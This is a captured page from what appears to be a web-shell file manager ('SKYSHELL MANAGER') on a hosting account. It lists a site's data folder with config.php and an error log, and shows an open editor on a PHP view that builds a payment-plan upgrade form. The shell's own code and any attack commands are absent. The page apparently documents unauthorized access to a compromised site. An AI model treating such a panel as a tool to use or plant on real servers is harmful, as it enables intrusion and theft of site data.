📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
24257.5 KB
0644
🗑️
⬇️
✏️
🔒
Editing: upgrade_plan_semi.php
<?php $public_key =$this->Admin_db->get_public_live_key(); $private_key =$this->Admin_db->get_private_live_key(); //$full_name =str_replace(" ","_",$full_name); $token =time(); $site_name =$this->Admin_db->get_site_name(); ?> <div class="col-md-12"> <div class="row"> <?php $current_plan =$this->Action->get_store_current_plan($store_owner_id); $current_plan_amount =$this->Action->get_current_plan_amount($store_owner_id); $full_name =$this->Action->get_store_owner_full_name($store_owner_id); $phone_no =$this->Action->get_store_owner_phone_no($store_owner_id); $u_user_name =$this->Action->get_store_owner_user_name($store_owner_id); $u_user_id =$this->Action->get_store_owner_user_id($store_owner_id); $u_email =$this->Action->get_store_owner_email($store_owner_id); $user_name =$this->Action->get_store_owner_user_name($store_owner_id); ?> <div class="card col-md-12"> <div class="card-block"> <div class="row" id=""> <?php if(is_array($get_info)){ foreach($get_info as $row){ $id =$row['id']; $title =$row['title']; $store_num =$row['store_num']; $store_desc =$row['store_desc']; $amount =$row['amount']; $image =$row['image']; $currency ='₦'; $new_amount =$amount/2; if($current_plan !=$title && $current_plan_amount < $amount){ ?> <div class="col-lg-12 col-xl-3" style="margin-top:1.5%;"> <div class="card-sub"> <img class="card-img-top img-fluid" src="<?php echo $image;?>" alt="<?php echo $title;?>"> <div class="card-block" style="text-align:center;"> <h4 class="card-title" style="font-weight:bold;">6 Months</h4> </div> <div class="card-block"> <h4 class="card-title" style="font-weight:bold; color:#98AFC7;"><?php echo $title;?></h4> <div style="margin-top:1.5%;"> <p>Number of Companies: <b><strong><?php echo $store_num;?></strong></b></p> <p>Per Month: <b><strong><?php echo $currency.$this->cart->format_number($new_amount/6);?></strong></b></p> <p>Total Amount: <b><strong><?php echo $currency.$this->cart->format_number($amount/2);?></strong></b></p> </div> <form method="post" action="<?php echo base_url();?>Plans/verify_payment"> <input type="hidden" name="user_name" value="<?php echo $u_user_name;?>" /> <input type="hidden" name="user_id" value="<?php echo $u_user_id;?>" /> <input type="hidden" name="plan_type" value="<?php echo 'semi';?>" /> <input type="hidden" name="plan_id" value="<?php echo $id;?>" /> <input type="hidden" name="plan_mode" value="<?php echo 'upgrade';?>" /> <input type="submit" name="submit" class="btn btn-danger btn-block" value="Upgrade Plan"> </form> </div> </div> </div> <?php } } } ?> </div> </div> </div> </div> </div> <script type="text/javascript" src="<?php echo base_url();?>files/bower_components/jquery/dist/jquery.min.js"></script>
💾 Save Changes